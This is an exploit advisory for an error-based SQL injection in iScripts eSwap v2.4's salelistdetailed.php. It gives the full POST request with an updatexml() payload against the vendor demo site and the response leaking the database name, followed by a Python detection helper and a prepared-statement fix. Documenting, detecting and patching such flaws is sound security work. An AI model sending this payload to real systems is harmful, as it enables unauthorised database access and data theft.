Exploit title: iScripts eSwap v2.4 - SQL injection via the salelistdetailed.php User Panel

Date: 22/05/2018

Exploit Author: Keyone

Vendor Homepage: https://www.iscripts.com

Software Link: https://www.iscripts.com/eswap

Demo Link: https://www.demo.iscripts.com/eswap/demo//index.php

Version: 2.4

Tested on: Windows 7

Category: Webapps

CVE:


Description


iScripts eSwap v2.4 has SQL injection via the "ToId" POST parameter of "salelistdetailed.php" in the User Panel. The parameter is concatenated into a MySQL query without sanitisation, and the database error is reflected in the page (error-based injection).

POC : 'ToId' parameter


Request:

POST /eswap/demo/salelistdetailed.php?type=sell HTTP/1.1
Host: www.demo.iscripts.com
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
Accept: */*
DNT: 1
Referer: https://www.demo.iscripts.com/eswap/demo/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: __utmc=227100805; __utmz=227100805.1526871632.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=csv8f9jgmjl6sh1spblmikbra0; messagesUtk=4f44605715d9c930d9c1241135f98fbf; __utma=129714457.1643618766.1526980257.1526980257.1526980257.1; __utmc=129714457; __utmz=129714457.1526980257.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227100805.862283.1526871632.1526871632.1526980259.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 171

btnGo=Send%20Message&btnSubAdd=1&msgId=1&qyery=type=sell&ToId=1' and (select updatexml(1,concat(0x2b,database()),1)) and '1'='1&txtMsg=1&txtMsg46=1&txtTitle=1&txtTitle46=Mr.

Response:

HTTP/1.1 200 OK
Date: Tue, 22 May 2018 14:49:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 16833
...
</div></div>
<div class="col-lg-9">
<div>
XPATH syntax error: '+productd_eswapdemo'
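The request and response above are the two artefacts a defender can match on: a non-numeric value in a parameter that should only ever be an integer, and a MySQL XPATH error string echoed back in the HTML. The following detection helper is an added example and is not part of the advisory or of the eSwap code base; the choice of which parameters are treated as integers (ToId, msgId) is an assumption drawn from the request shown above, and the sample body and response fragment are copied from this page.

```python
"""Detection helper for the error-based SQL injection described above.

Added example, not part of the advisory. It models two checks that can be
run over web-server or WAF logs for salelistdetailed.php:
  1. 'ToId' and 'msgId' are expected to be integers (assumption based on the
     captured request), so any non-numeric value is suspicious;
  2. a MySQL "XPATH syntax error" in the response body is the signature of
     error-based extraction via updatexml()/extractvalue().
"""
import re
from typing import List, Optional
from urllib.parse import parse_qs

# Parameters the captured request shows as numeric identifiers (assumption).
INTEGER_PARAMS = {"ToId", "msgId"}

# MySQL XML functions whose error messages leak query results; the advisory's
# payload uses updatexml().
ERROR_BASED_FUNCS = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.IGNORECASE)

# Error string MySQL emits when those functions receive a malformed XPath.
XPATH_ERROR = re.compile(r"XPATH syntax error: '(.*?)'")

# Sample input taken from the advisory's request body and response fragment.
SAMPLE_BODY = (
    "btnGo=Send%20Message&btnSubAdd=1&msgId=1&qyery=type=sell"
    "&ToId=1' and (select updatexml(1,concat(0x2b,database()),1)) and '1'='1"
    "&txtMsg=1&txtMsg46=1&txtTitle=1&txtTitle46=Mr."
)
SAMPLE_RESPONSE = (
    '</div></div>\n<div class="col-lg-9">\n<div>\n'
    "XPATH syntax error: '+productd_eswapdemo'"
)


def inspect_request(body: str) -> List[str]:
    """Return findings for one url-encoded POST body (empty list if clean)."""
    findings = []
    # keep_blank_values so an empty ToId= is still checked against the type rule
    params = parse_qs(body, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            if name in INTEGER_PARAMS and not value.isdigit():
                findings.append(f"{name}: expected integer, got {value!r}")
            if ERROR_BASED_FUNCS.search(value):
                findings.append(f"{name}: error-based SQL function in value")
    return findings


def leaked_from_response(html: str) -> Optional[str]:
    """Return the text disclosed through a MySQL XPATH error, or None."""
    match = XPATH_ERROR.search(html)
    return match.group(1) if match else None


if __name__ == "__main__":
    for finding in inspect_request(SAMPLE_BODY):
        print("request:", finding)
    leaked = leaked_from_response(SAMPLE_RESPONSE)
    if leaked is not None:
        print("response leaked:", leaked)
```

Run over the captured exchange, the request check fires twice on ToId (non-integer value, updatexml() present) and the response check recovers the string the server disclosed. The corresponding fix on the application side is to cast ToId to an integer and bind it as a parameter of a prepared statement, so that the value never reaches the query parser as SQL text.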